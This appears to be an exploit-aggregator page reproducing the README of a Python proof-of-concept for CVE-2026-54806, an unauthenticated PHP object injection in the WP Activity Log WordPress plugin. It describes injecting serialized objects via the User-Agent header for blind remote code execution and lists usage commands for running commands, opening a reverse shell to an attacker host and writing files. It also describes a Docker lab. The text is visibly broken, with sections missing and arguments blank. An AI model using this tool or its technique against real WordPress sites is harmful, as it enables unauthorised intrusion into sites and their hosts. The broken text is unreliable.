Exploit for CVE-2026-54806

## https://sploitus.com/exploit?id=6187732A-19DB-57D3-B916-91087E253791
WP Activity Log PHP Object Injection (CVE-2026-54806) PoC


    
    
      
    


## 📜 Description

CVE-2026-54806 is a critical (CVSS 9.8) unauthenticated PHP Object Injection vulnerability in the WP Activity Log WordPress plugin (wp-security-audit-log) by Melapress. An unauthenticated attacker can inject serialized PHP objects via the User-Agent header on any request that triggers a logged event (e.g. a failed login). The injected payload is stored in the database and deserialized without restrictions when an admin visits the WordPress dashboard, leading to blind remote code execution (no output returned to the attacker).

**Affected plugin:** WP Activity Log  --check
python3 cve-2026-54806.py -t  --command 
python3 cve-2026-54806.py -t  --shell --lhost  --lport 
python3 cve-2026-54806.py -t  --write-file  
```

## 🐋 Docker PoC

Self-contained lab with WordPress 6.4.1 + WP Activity Log 5.6.3.1.
Check [DOCKER.md](/docker/DOCKER.md) for details.

```bash
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
```

The lab includes an `admin-bot` that visits the dashboard every 60s, so injected
payloads fire automatically — no manual interaction needed.

## 🕵🏼 References

- [WP Activity Log — Melapress](https://melapress.com/wordpress-activity-log/)
- [NVD — CVE-2026-54806](https://nvd.nist.gov/vuln/detail/CVE-2026-54806)
- [Patchstack — CVE-2026-54806](https://patchstack.com/database/wordpress/plugin/wp-security-audit-log/vulnerability/wordpress-wp-activity-log-plugin-5-6-3-1-php-object-injection-vulnerability)

## 📢 Disclaimer

This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by this tool.